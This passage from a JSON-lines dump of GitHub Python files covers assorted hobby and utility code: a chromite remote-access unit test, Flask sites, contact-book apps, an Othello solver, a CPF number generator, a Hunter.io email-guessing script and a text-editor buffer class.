self.ERROR)\n\n def testRemoteCmdFailure(self):\n \"\"\"Test failure in remote cmd.\"\"\"\n self.SetRemoteShResult(returncode=1)\n self.assertRemoteShRaises()\n self.assertRemoteShRaises(ssh_error_ok=True)\n self.host.RemoteSh(self.TEST_CMD, error_code_ok=True)\n self.host.RemoteSh(self.TEST_CMD, ssh_error_ok=True, error_code_ok=True)\n\n def testSshFailure(self):\n \"\"\"Test failure in ssh commad.\"\"\"\n 
self.SetRemoteShResult(returncode=remote_access.SSH_ERROR_CODE)\n self.assertRemoteShRaises()\n self.assertRemoteShRaises(error_code_ok=True)\n self.host.RemoteSh(self.TEST_CMD, ssh_error_ok=True)\n self.host.RemoteSh(self.TEST_CMD, ssh_error_ok=True, error_code_ok=True)\n\n\nclass CheckIfRebootedTest(RemoteAccessTest):\n\n def MockCheckReboot(self, returncode):\n self.rsh_mock.AddCmdResult(\n partial_mock.Regex('.*%s.*' % re.escape(remote_access.REBOOT_MARKER)),\n returncode)\n\n def testSuccess(self):\n \"\"\"Test the case of successful reboot.\"\"\"\n self.MockCheckReboot(0)\n self.assertTrue(self.host._CheckIfRebooted())\n\n def testRemoteFailure(self):\n \"\"\"Test case of reboot pending.\"\"\"\n self.MockCheckReboot(1)\n self.assertFalse(self.host._CheckIfRebooted())\n\n def testSshFailure(self):\n \"\"\"Test case of connection down.\"\"\"\n self.MockCheckReboot(remote_access.SSH_ERROR_CODE)\n self.assertFalse(self.host._CheckIfRebooted())\n\n def testInvalidErrorCode(self):\n \"\"\"Test case of bad error code returned.\"\"\"\n self.MockCheckReboot(2)\n self.assertRaises(Exception, self.host._CheckIfRebooted)\n\n\nif __name__ == '__main__':\n cros_test_lib.main()\n","repo_name":"espadrine/opera","sub_path":"chromium/src/third_party/chromite/lib/remote_access_unittest.py","file_name":"remote_access_unittest.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"25866769474","text":"import noggin_constants as NogginConstants\nfrom objects import Location\n\nKICK_STRAIGHT_BEARING_THRESH = 20\n\n(LEFT_FOOT,\n RIGHT_FOOT,\n MID_LEFT,\n MID_RIGHT,\n INCORRECT_POS ) = range(5)\n\n# Kick objectives\nNUM_OBJECTIVES = 6\n(OBJECTIVE_CLEAR,\n OBJECTIVE_CENTER,\n OBJECTIVE_SHOOT_CLOSE,\n OBJECTIVE_SHOOT_FAR,\n OBJECTIVE_KICKOFF,\n OBJECTIVE_UNCLEAR) = range(NUM_OBJECTIVES)\n","repo_name":"northern-bites/nbites","sub_path":"src/man/behaviors/players/KickingConstants.py","file_name":"KickingConstants.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"48"} +{"seq_id":"10713243661","text":"#!/usr/bin/env python\n\ntry:\n from magpy.stream import *\n from magpy.absolutes import *\n from magpy.transfer import *\n from magpy.database import *\nexcept:\n from magpy.stream import *\n from magpy.absolutes import *\n from magpy.transfer import *\n from magpy.database import *\n\nimport wx\n\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wx import NavigationToolbar2Wx\nfrom matplotlib.figure import Figure\n\n\n\nclass AbsolutePage(wx.Panel):\n #def __init__(self, parent):\n #wx.Panel.__init__(self,parent,-1,size=(100,100))\n def __init__(self, *args, **kwds):\n wx.Panel.__init__(self, *args, **kwds)\n self.comp = ['xyz', 'hdz', 'idf']\n self.dipathlist = []\n self.createControls()\n self.doLayout()\n self.extension = '*'\n\n # Widgets\n def createControls(self):\n self.diLabel = wx.StaticText(self, label=\"DI files:\")\n self.loadDIButton = wx.Button(self,-1,\"Load DI data\",size=(160,30))\n self.diTextCtrl = wx.TextCtrl(self, value=\"None\",size=(160,40),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n self.defineVarioButton = wx.Button(self,-1,\"Variometer path\",size=(160,30))\n self.varioTextCtrl = wx.TextCtrl(self, value=\"None\",size=(160,40),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n self.varioextLabel = 
wx.StaticText(self, label=\"ext: e.g. *, *.sec, *.cdf\")\n self.varioextTextCtrl = wx.TextCtrl(self, value=\"*.min\",size=(160,40))\n self.defineScalarButton = wx.Button(self,-1,\"Scalar path\",size=(160,30))\n self.scalarTextCtrl = wx.TextCtrl(self, value=\"None\",size=(160,40),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n self.scalarextLabel = wx.StaticText(self, label=\"ext: e.g. *, *.sec, *.cdf\")\n self.scalarextTextCtrl = wx.TextCtrl(self, value=\"*.min\",size=(160,40))\n self.AnalyzeButton = wx.Button(self,-1,\"Analyze\",size=(160,30))\n self.logLabel = wx.StaticText(self, label=\"Logging:\")\n self.advancedButton = wx.Button(self,-1,\"Set parameter\",size=(160,30))\n self.ClearLogButton = wx.Button(self,-1,\"Clear Log\",size=(160,30))\n self.SaveLogButton = wx.Button(self,-1,\"Save Log\",size=(160,30))\n self.dilogTextCtrl = wx.TextCtrl(self, wx.ID_ANY, size=(330,300),\n style = wx.TE_MULTILINE|wx.TE_READONLY|wx.HSCROLL|wx.VSCROLL)\n\n\n def doLayout(self):\n\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n # Title\n #self.centred_text = wx.StaticText(self, label=\"DI Analysis\")\n #mainSizer.Add(self.centred_text, 0, wx.ALIGN_CENTRE | wx.ALL, 3)\n\n # Grids\n #content_sizer = wx.BoxSizer(wx.HORIZONTAL)\n #grid_1 = wx.GridSizer(12, 2, 0, 0)\n #grid_1.AddMany(wx.StaticText(self.panel, label=str(i)) for i in xrange(24))\n #content_sizer.Add(grid_1, 1, wx.EXPAND | wx.ALL, 3)\n #grid_2 = wx.GridSizer(10, 3, 0, 0)\n #grid_2.AddMany(wx.StaticText(self.panel, label=str(i)) for i in xrange(30))\n #content_sizer.Add(grid_2, 1, wx.EXPAND | wx.ALL, 3)\n\n # A horizontal BoxSizer will contain the GridSizer (on the left)\n # and the logger text control (on the right):\n boxSizer = wx.BoxSizer(orient=wx.HORIZONTAL)\n # A GridSizer will contain the other controls:\n gridSizer = wx.FlexGridSizer(rows=10, cols=2, vgap=10, hgap=10)\n\n # Prepare some reusable arguments for calling sizer.Add():\n expandOption = dict(flag=wx.EXPAND)\n noOptions = dict()\n emptySpace = ((0, 0), noOptions)\n\n # Add the controls to the sizers:\n for control, options in \\\n [(self.loadDIButton, dict(flag=wx.ALIGN_CENTER)),\n (self.diTextCtrl, expandOption),\n (self.defineVarioButton, dict(flag=wx.ALIGN_CENTER)),\n (self.varioTextCtrl, expandOption),\n (self.varioextLabel, noOptions),\n (self.varioextTextCtrl, expandOption),\n (self.defineScalarButton, dict(flag=wx.ALIGN_CENTER)),\n (self.scalarTextCtrl, expandOption),\n (self.scalarextLabel, noOptions),\n (self.scalarextTextCtrl, expandOption),\n emptySpace,\n emptySpace,\n (self.diLabel, noOptions),\n emptySpace,\n (self.AnalyzeButton, dict(flag=wx.ALIGN_CENTER)),\n (self.advancedButton, dict(flag=wx.ALIGN_CENTER)),\n emptySpace,\n emptySpace,\n (self.logLabel, noOptions),\n emptySpace,\n (self.ClearLogButton, dict(flag=wx.ALIGN_CENTER)),\n (self.SaveLogButton, dict(flag=wx.ALIGN_CENTER))]:\n gridSizer.Add(control, **options)\n\n for control, options in \\\n [(gridSizer, dict(border=5, flag=wx.ALL))]:\n boxSizer.Add(control, **options)\n\n\n mainSizer.Add(boxSizer, 1, wx.EXPAND)\n\n self.centred_text = wx.StaticText(self, label=\"DI Analysis Log:\")\n mainSizer.Add(self.centred_text, 0, wx.ALIGN_LEFT | wx.ALL, 3)\n mainSizer.Add(self.dilogTextCtrl, 0, wx.ALIGN_LEFT | wx.ALL, 3)\n\n self.SetSizerAndFit(mainSizer)\n\n #boxSizer.Add(self.dilogTextCtrl, 0, wx.ALL|wx.CENTER, 5)\n #boxSizer.Add(self.dilogTextCtrl,expandOption, dict(border=5, flag=wx.ALL))\n 
#self.SetSizerAndFit(boxSizer)\n","repo_name":"andrewkovachik/magpy","sub_path":"magpy/gui/absolutespage.py","file_name":"absolutespage.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"30104221560","text":"import sys\n\nidsFile = sys.argv[1]\nNamesAndIdsFile = sys.argv[2]\noname = sys.argv[3]\n\nwith open(idsFile) as f:\n content = f.readlines()\nids = [x.strip() for x in content]\n\nIdToName = {}\nwith open(NamesAndIdsFile) as f:\n content = f.readlines()\ncontent = [x.strip() for x in content]\nfor line in content:\n\ttup = line.split()\n\tIdToName[tup[2]] = tup[1][4:]\n\nwith open(oname, 'w') as fd:\t\t\n\tfor i in ids:\n\t\tif i == \"\":\n\t\t\tcontinue\t\n\t\tfd.write(\"SyS_\" + IdToName[i] + '\\n')\n\t\tfd.write(\"sys_\" + IdToName[i] + '\\n')","repo_name":"wliuxingxiangyu/kernel-specialization","sub_path":"examples/generateSysCallList.py","file_name":"generateSysCallList.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"26087118133","text":"# Create a phone directory with the ability to import and export data in several formats.\n\n\nimport os\nimport user_interface as ui\nimport csv_model as cm\nimport database_methods as dm\n\nkey_in = ui.first_menu()\nif key_in == 2:\n exit()\nelif key_in == 1:\n file_name = ui.file_name()\n if not os.path.isfile(file_name):\n cm.write_file(file_name, [])\n list_file_element = cm.read_file(file_name)\n\nwhile True:\n key_in = ui.second_menu()\n if key_in == 3:\n exit()\n elif key_in == 1:\n dm.output_list(list_file_element)\n elif key_in == 2:\n dm.add_record(list_file_element)\n cm.write_file(file_name, list_file_element)\n\n","repo_name":"MikleKho/Python_basics_HW_Lesson07","sub_path":"Task_07_01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"878011786","text":"\"\"\"API endpoints for the maps' app.\"\"\"\n\nfrom flask import request\nfrom flask_restx import Resource, fields, marshal_with\n\nfrom maps.apis import api\nfrom maps.routes import get_all_markers, to_date, add_report_to_db\n\nget_model = api.model(\n \"Report\",\n {\n \"id\": fields.Integer,\n \"latitude\": fields.Float,\n \"longitude\": fields.Float,\n \"color\": fields.String,\n \"comment\": fields.String,\n \"created_at\": fields.DateTime(dt_format=\"rfc822\"),\n },\n)\n\npost_model = api.model(\n \"Report\",\n {\n \"latitude\": fields.Float,\n \"longitude\": fields.Float,\n \"color\": fields.String,\n \"comment\": fields.String(required=False),\n },\n)\n\n\n@api.route(\"/markers//\", methods=[\"GET\"])\nclass Report(Resource):\n \"\"\"Report resource from Report DB model.\"\"\"\n\n @marshal_with(get_model)\n def get(self, date):\n \"\"\"\n Retrieve all markers with date provided.\n Use 2022-08-14 arg date format to get all markers from 14 August 2022.\n \"\"\"\n return get_all_markers(request_date=to_date(date))\n\n\n@api.route(\"/markers/\", methods=[\"POST\", \"PUT\"])\nclass AddReport(Resource):\n \"\"\"Add Report resource to DB model.\"\"\"\n\n @api.doc(responses={201: \"Created\", 400: \"Validation error\"})\n @api.expect(post_model)\n @marshal_with(post_model)\n def put(self):\n \"\"\"POST or PUT method for adding marker to DB.\"\"\"\n add_report_to_db(\n latitude=request.json[\"latitude\"],\n longitude=request.json[\"longitude\"],\n 
color=request.json[\"color\"],\n comment=request.json[\"comment\"],\n )\n return request.json, 201\n","repo_name":"VetalM84/flaskFolium","sub_path":"maps/apis/api_v1.py","file_name":"api_v1.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14422500721","text":"from sincronizarBD import categorias, essencias, misturas\nfrom flask import Flask, render_template, redirect, url_for, request\nimport db_actions\n\nimport criadorEssencia\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n essencias = db_actions.getAllEssenciasSimple()\n return render_template(\"index.html\", essencias=essencias)\n\n@app.route('/misturas')\ndef misturas():\n misturas = db_actions.getAllMisturasSimple()\n return render_template(\"misturas.html\", misturas=misturas)\n\n@app.route('/form_criar_essencias')\ndef form_criar_essencias():\n return render_template(\"criador_essencias.html\")\n\n@app.route('/criar_essencia', methods=['POST'])\ndef criar_essencia():\n criadorEssencia.criarEssencia(request.form['nome'],\n request.form['marca'],\n request.form['desc'],\n request.form['preco'],\n request.form['foto'],\n request.form['qtd'],\n request.form['categoria'])\n return redirect(url_for(\"index\"))\n\n@app.route('/contato')\ndef contato():\n return render_template('contato.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"2904nando/narguis_sabores","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4998806724","text":"#!/usr/bin/env python 3\n\n############################################################################################\n# #\n# Program purpose: Sorts a list based on the first character of word. 
#\n# Program Author : Happi Yvan #\n# Creation Date : November 18, 2019 #\n# #\n############################################################################################\n\nfrom itertools import groupby\nfrom operator import itemgetter\n\nif __name__ == \"__main__\":\n word_list = ['be', 'have', 'do', 'say', 'get', 'make', 'go', 'know', 'take', 'see', 'come', 'think',\n 'look', 'want', 'give', 'use', 'find', 'tell', 'ask', 'work', 'seem', 'feel', 'leave', 'call']\n\n for (letter, words) in groupby(sorted(word_list), key=itemgetter(0)):\n print(letter)\n for word in words:\n print(word)","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/List/program-40.py","file_name":"program-40.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13003436888","text":"import sys\nsys.stdin = open(\"재미있는 오셀로 게임_input.txt\", \"r\")\n\nT = int(input())\nfor test_case in range(T):\n N, P = map(int, input().split())\n data = [[0 for _ in range(N+1)] for _ in range(N+1)]\n data[N // 2 + 1][N // 2], data[N // 2][N // 2 + 1] = 1, 1\n data[N // 2][N // 2], data[N // 2 + 1][N // 2 + 1] = 2, 2 # place W and B in the center of the Othello board\n\n dx = [-1, 1, 0, 0, -1, 1, -1, 1]\n dy = [0, 0, -1, 1, -1, -1, 1, 1] # up, down, left, right, up-left, down-left, up-right, down-right\n for _ in range(P):\n x, y, P = map(int, input().split())\n data[x][y] = P # read the Othello move input\n\n for i in range(8):\n new_x = x + dx[i] # scan in each direction to flip discs\n new_y = y + dy[i]\n stack = []\n while 0 < new_x <= N and 0 < new_y <= N:\n if data[new_x][new_y] == 0:\n break\n elif data[new_x][new_y] != P:\n stack.append(new_x)\n stack.append(new_y)\n elif data[new_x][new_y] == P:\n while stack:\n turn_y = stack.pop()\n turn_x = stack.pop()\n data[turn_x][turn_y] = P\n break\n new_x += dx[i]\n new_y += dy[i]\n B = 0\n W = 0\n for x in range(N+1):\n for y in range(N+1):\n if data[x][y] == 1:\n B += 1\n elif data[x][y] == 2:\n W += 1\n print(\"#{} {} {}\".format(test_case+1, B, W))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/문제/수업/D-15/재미있는 오셀로 게임.py","file_name":"재미있는 오셀로 게임.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32660859369","text":"def solution(nums):\n answer = 0\n select = len(nums) // 2 # the maximum number of Pokemon to pick is half the length of nums\n set_nums = set(nums) # set_nums holds the distinct Pokemon kinds\n \n if select < len(set_nums) : # if the pick limit is smaller than the number of kinds, select is the maximum\n answer = select\n else : # otherwise, the total number of kinds is the answer\n answer = len(set_nums)\n \n return answer","repo_name":"KimHyungkeun/Algorithm","sub_path":"Programmers/Python/2021/모든문제/폰켓몬_플밍마에스터.py","file_name":"폰켓몬_플밍마에스터.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25205459957","text":"\"\"\"Phone Contacts\nThis program simulates a phone contacts app, allowing the user to add a new\ncontact, edit an existing contact, view all contacts, or delete a contact.\n\"\"\"\n\nimport sqlite3\nfrom sqlite3 import Error\nimport sys\n\nDATABASE = r\"./phone_contacts/main.db\"\n\n\ndef create_connection(db_file):\n \"\"\"returns a connection object to database file to interact with sqlite\"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as err:\n print(err)\n return conn\n\n\ndef create_table(conn, create_table_sql):\n \"\"\"creates contacts table if one does not already exist\"\"\"\n try:\n 
cur = conn.cursor()\n cur.execute(create_table_sql)\n except Error as err:\n print(err)\n\n\ndef add_contact(conn, contact):\n \"\"\"adds the new contact to the contacts table\"\"\"\n query = '''INSERT INTO contacts(phone_number,first_name,\n last_name,addr,email_addr) VALUES(?,?,?,?,?)'''\n cur = conn.cursor()\n cur.execute(query, contact)\n conn.commit()\n return cur.lastrowid\n\n\ndef create_contact(conn):\n \"\"\"creates a new valid contact from user input\"\"\"\n valid = False\n print()\n while not valid:\n phone_number = input(\"Please enter in a valid phone number.\\n> \")\n cur = conn.cursor()\n try:\n cur.execute('''SELECT * FROM contacts WHERE\n phone_number = ?''', (phone_number,))\n check = cur.fetchall()\n if len(check) == 0:\n valid = True\n else:\n print(\"\\nYou already have this number saved in your contacts.\")\n except Error:\n if len(phone_number) <= 10:\n valid = True\n first_name = input(\"Please enter in the first name.\\n> \")\n last_name = input(\"Please enter in the last name.\\n> \")\n addr = input(\"Please enter in the full address.\\n> \")\n email_addr = input(\"Please enter in the email address.\\n> \")\n print()\n\n with conn:\n new_contact = (phone_number, first_name, last_name, addr, email_addr)\n add_contact(conn, new_contact)\n\n\ndef edit_contact(conn):\n \"\"\"edit information from a specified, existing contact\"\"\"\n cur = conn.cursor()\n print(\"\\nPlease enter in the phone number you would like to edit.\")\n choice = input(\"> \")\n\n cur.execute(\"SELECT rowid FROM contacts WHERE phone_number = ?\", (choice,))\n records = cur.fetchone()\n if records is None:\n print(\"This number is not currently saved as a contact.\\n\")\n else:\n print(\"\\nPress 'enter' if you would not like to change the info.\\n\")\n first_name = input(\"Please enter in the first name.\\n> \")\n if first_name != \"\":\n cur.execute(\"UPDATE contacts SET first_name = ? WHERE phone_number = ?\", (first_name, choice))\n last_name = input(\"Please enter in the last name.\\n> \")\n if last_name != \"\":\n cur.execute(\"UPDATE contacts SET last_name = ? WHERE phone_number = ?\", (last_name, choice))\n addr = input(\"Please enter in the full address.\\n> \")\n if addr != \"\":\n cur.execute(\"UPDATE contacts SET addr = ? WHERE phone_number = ?\", (addr, choice))\n email_addr = input(\"Please enter in the email address.\\n> \")\n if email_addr != \"\":\n cur.execute(\"UPDATE contacts SET email_addr = ? WHERE phone_number = ?\", (email_addr, choice))\n conn.commit()\n print()\n\n\ndef view_contacts(conn):\n \"\"\"print all contacts stored in contacts database\"\"\"\n query = '''SELECT * from contacts'''\n cur = conn.cursor()\n cur.execute(query)\n records = cur.fetchall()\n print(f\"\\nYOU CURRENTLY HAVE {len(records)} CONTACTS SAVED.\\n\")\n\n for row in records:\n print(f\"Phone Number: {row[1]}\")\n print(f\"First Name: {row[2]}\")\n print(f\"Last Name: {row[3]}\")\n print(f\"Address: {row[4]}\")\n print(f\"Email Address: {row[5]}\\n\")\n\n\ndef delete_contact(conn):\n \"\"\"delete a specified, existing contact\"\"\"\n cur = conn.cursor()\n print(\"\\nPlease enter in the phone number you would like to delete.\")\n print(\"If you would like to delete the entire contacts list, type 'all'\")\n choice = input(\"> \")\n\n if choice == 'all':\n cur.execute(\"DELETE FROM contacts\")\n else:\n cur.execute(\"DELETE FROM contacts WHERE phone_number = ?\", (choice,))\n conn.commit()\n print()\n\n\ndef main():\n \"\"\"initial set up for contacts database\"\"\"\n contacts = \"\"\" CREATE TABLE IF NOT EXISTS contacts (\n [contact_id] INTEGER PRIMARY KEY UNIQUE,\n [phone_number] NVARCHAR(10) NOT NULL UNIQUE,\n [first_name] NVARCHAR(50) NOT 
NULL,\n [last_name] NVARCHAR(50) NULL,\n [addr] NVARCHAR(255) NULL,\n [email_addr] NVARCHAR(255) NULL\n );\"\"\"\n\n conn = create_connection(DATABASE)\n create_table(conn, contacts)\n return conn\n\n\nINTRO = \"\"\"(´• ω •`) ♡ WELCOME TO YOUR PHONE CONTACTS! (´ε` )♡\nType 'add' to add a new contact.\nType 'edit' to edit a contact.\nType 'view' to view your contacts.\nType 'delete' to delete a contact.\nType 'quit' to quit the program.\n\"\"\"\n\nif __name__ == \"__main__\":\n print(INTRO)\n CONN = main()\n CHOICE = \"\"\n while CHOICE != \"quit\":\n CHOICE = input(\"Please select an option.\\n> \")\n if CHOICE == \"add\":\n create_contact(CONN)\n elif CHOICE == \"edit\":\n edit_contact(CONN)\n elif CHOICE == \"delete\":\n delete_contact(CONN)\n elif CHOICE == \"view\":\n view_contacts(CONN)\n CONN.close()\n sys.exit()\n","repo_name":"jenphan/python-projects","sub_path":"phone_contacts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39442927862","text":"# Automatic CPF number generator lol\r\n\r\nfrom random import randint\r\n\r\ndigitos = list()\r\nsoma = list()\r\n\r\n# Only the first 9 digits of the number are generated here\r\n\r\nfor num in range(0, 9):\r\n digitos.append(randint(0, 9))\r\n\r\n# Multiplies the 9 digits by weights 10 down to 2, then the 10 digits by 11 down to 2\r\n\r\nfor v in range(0, 2):\r\n\r\n tam = len(digitos)\r\n\r\n for pos, n in enumerate(digitos):\r\n mult = n * (tam + 1)\r\n tam -= 1\r\n soma.append(mult)\r\n\r\n digito_novo = 11 - (sum(soma) % 11)\r\n\r\n if digito_novo <= 9:\r\n digitos.append(digito_novo)\r\n else:\r\n digitos.append(0)\r\n soma.clear()\r\n\r\n\r\nprint('Your CPF is: ', end='')\r\nfor pos, digito in enumerate(digitos):\r\n print(digito, end='')\r\n if pos == 2 or pos == 5:\r\n print('.', end='')\r\n if pos == 8:\r\n print('-', end='')\r\n","repo_name":"Relampago14/CursodePython3-Udemy","sub_path":"exercício 9.py","file_name":"exercício 9.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35595617150","text":"import numpy as np\nimport pandas as pd\nimport requests\n\n#Sourcer Class to handle all sourcing functionality\nclass Sourcer:\n def __init__(self, hunter_api_key):\n self.hunter_api_key = hunter_api_key \n self.client_info_df = None\n\n #Create new client info dataframe using linkedin API\n def generate_client_info_df(self, companies, roles, num_contacts):\n return\n\n #Read existing client info csv into dataframe\n #Assuming client_info is all filled in except for email address (Columns: First Name, Last Name, Full Name, Company)\n def read_client_info_csv(self, path):\n self.client_info_df = pd.read_csv(path, delimiter=',')\n self.client_info_df = self.client_info_df.dropna(thresh=5) #Remove nan rows with at least 5 non Nan values in columns\n self.fill_emails()\n\n #Fills emails based on client_info_csv using hunter.io API, mutates existing objects client_info_df\n #Writes only sourced email addresses as CSV to Emails.csv\n def fill_emails(self):\n\n #Applied function to get email for individual based on company pattern\n def replace_email_format(company, firstName, lastName):\n pattern = email_address_map[company]\n email_address = pattern\n email_address = email_address.replace('{first}', firstName)\n email_address = email_address.replace('{last}', lastName)\n email_address = email_address.replace('{f}', 
firstName[0:1])\n return email_address\n\n #Read email address mappings\n email_address_map = {}\n companies = self.client_info_df.Company.unique()\n for company in companies:\n #API call to Hunter.io to get email format\n hunter_resp = requests.get('https://api.hunter.io/v2/domain-search?company=' + company + '&api_key=' + self.hunter_api_key)\n if hunter_resp.status_code != 200:\n raise RuntimeError('GET /v2/domain-search failed: {}'.format(hunter_resp.status_code))\n pattern = hunter_resp.json()['data']['pattern'] + '@' + hunter_resp.json()['data']['domain']\n email_address_map[company] = pattern\n\n # Replace email address column with valid emails\n self.client_info_df['Email Address'] = self.client_info_df.apply(lambda row : replace_email_format(row['Company'], row['First Name'], row['Last Name']), axis=1)\n print(self.client_info_df)\n\n #Write Email Addresses Only to output CSV\n email_address_df = self.client_info_df['Email Address']\n email_address_df.to_csv('Emails.csv', header=False)\n\n #Write client info dataframe to output csv for use\n def write_client_info_csv(self, path):\n self.client_info_df.to_csv(path)\n\n \n ","repo_name":"wsxdrorange/Sourcer","sub_path":"Sourcer.py","file_name":"Sourcer.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37689427072","text":"\nclass EditBuffer(object):\n\n def __init__(self):\n self._first_line = _EditBufferNode(text=['\\n'])\n self._last_line = self._first_line\n self._current_line = self._first_line\n self._current_column_index = 0\n self._current_line_index = 0\n self._num_lines = 1\n self._insert_mode = True\n\n # Returns the number of lines in the text buffer.\n def num_lines(self):\n return self._num_lines\n\n # Returns the length of the current line that includes the newline character\n def num_chars(self):\n return len(self._current_line.text)\n\n # Returns the line index of the line containing the cursor. The first line has an index of 0\n def line_index(self):\n return self._current_line_index\n\n # Returns the column index of the cursor within the current line. The first position in each line has an index of 0\n def column_index(self):\n return self._current_column_index\n\n # Sets the entry mode to either insert or overwrite based on the value of the boolean argument insert.\n # True: insert mode\n # False: overwrite mode\n def set_entry_mode(self, insert=True):\n self._insert_mode = insert\n\n # Toggles the entry mode to either insert or overwrite based on the current mode.\n def toggle_entry_mode(self):\n self._insert_mode = not self._insert_mode\n\n # Returns true if the current entry mode is set to insert and false otherwise\n def in_insert_mode(self):\n return self._insert_mode is True\n\n # Returns the character at the current cursor position\n def get_char(self):\n return self._current_line.text[self._current_column_index]\n\n # Returns the contents of the current line as a string that includes the newline character\n # If show_mode is True, the string will also include the position of the cursor\n def get_line(self, show_mode=False):\n if not show_mode:\n return ''.join(self._current_line.text)\n else:\n cursor_str_list = [' ' for i in range(self._current_column_index)]\n cursor_str_list.append('^\\n')\n return ''.join(self._current_line.text) + ''.join(cursor_str_list)\n\n # Moves the cursor up num lines. 
The cursor is kept at the same character position unless the new line is shorter,\n # in which case the cursor is placed at the end of the new line. If num is negative, the cursor position is not changed.\n def move_up(self, num=1):\n if num > self._current_line_index:\n num = self._current_line_index\n self._current_line_index -= num\n\n for _ in range(num):\n self._current_line = self._current_line.prev\n\n if len(self._current_line.text) - 1 < self._current_column_index:\n self._current_column_index = len(self._current_line.text) - 1\n\n # The same as move_up() except the cursor is moved down\n def move_down(self, num=1):\n if num > (self._num_lines - 1) - self._current_line_index:\n num = (self._num_lines - 1) - self._current_line_index\n self._current_line_index += num\n\n for _ in range(num):\n self._current_line = self._current_line.next\n\n if len(self._current_line.text) - 1 < self._current_column_index:\n self._current_column_index = len(self._current_line.text) - 1\n\n # Moves the cursor to the document's home position, which is the first line and first character position in that line.\n def move_doc_home(self):\n self._current_line = self._first_line\n self._current_line_index = 0\n self._current_column_index = 0\n\n # Moves the cursor to the document's end position, which is the last line and first character position in that line\n def move_doc_end(self):\n self._current_line = self._last_line\n self._current_line_index = self._num_lines - 1\n self._current_column_index = 0\n\n # Moves the cursor to the left one position. The cursor is wrapped to the end of the previous line if it is currently at the front of a line.\n def move_left(self):\n if self._current_column_index == 0:\n if self._current_line is not self._first_line:\n self._current_line = self._current_line.prev\n self._current_line_index -= 1\n self._current_column_index = len(self._current_line.text) - 1\n else:\n self._current_column_index -= 1\n\n # Moves the cursor to the right one position. The cursor is wrapped to the beginning of the next line if it is currently positioned at the end of a line.\n def move_right(self):\n if self._current_column_index == len(self._current_line.text) - 1:\n if self._current_line is not self._last_line:\n self._current_line = self._current_line.next\n self._current_line_index += 1\n self._current_column_index = 0\n else:\n self._current_column_index += 1\n\n # Moves the cursor to the front of the current line at the first character position\n def move_line_home(self):\n self._current_column_index = 0\n\n # Moves the cursor to the end of the current line.\n def move_line_end(self):\n self._current_column_index = len(self._current_line.text) - 1\n\n # Starts a new line at the cursor position. A newline character is inserted at the current position and all\n # characters following are moved to a new line. The new line is inserted immediately following the current line\n # and the cursor is adjusted to be at the first position of the new line.\n def break_line(self):\n new_line = _EditBufferNode(text=['\\n'])\n\n new_line.prev = self._current_line\n new_line.next = self._current_line.next\n\n if self._current_line.next is not None:\n self._current_line.next.prev = new_line\n self._current_line.next = new_line\n\n if self._current_line is self._last_line:\n self._last_line = new_line\n\n self._current_line = new_line\n\n self._current_column_index = 0\n self._current_line_index += 1\n\n self._num_lines += 1\n\n # Removes the entire line containing the cursor. 
The cursor is then moved to the front of the next line. If the\n # line being deleted is the last line, the cursor is moved to the front of the previous line.\n def delete_line(self):\n if self._num_lines != 1:\n if self._current_line is self._first_line:\n self._current_line.next.prev = None\n self._current_line = self._current_line.next\n self._num_lines -= 1\n self._current_column_index = 0\n\n self._first_line = self._current_line\n\n elif self._current_line is self._last_line:\n self._current_line.prev.next = None\n self._current_line = self._current_line.prev\n self._current_column_index = 0\n self._current_line_index -= 1\n self._num_lines -= 1\n\n self._last_line = self._current_line\n else:\n self._current_line.prev.next = self._current_line.next\n self._current_line.next.prev = self._current_line.prev\n self._current_line = self._current_line.next\n self._current_column_index = 0\n self._num_lines -= 1\n\n # Removes all of the characters at the end of the current line starting at the cursor position.\n # the newline character is not removed and the cursor is left at the end of the current line.\n def truncate_line(self):\n new_text = [ch for ch in self._current_line.text[:self._current_column_index + 1]]\n new_text.append('\\n')\n\n self._current_line.text = new_text\n\n # Inserts the given character into the buffer at the current position. If the current entry mode is 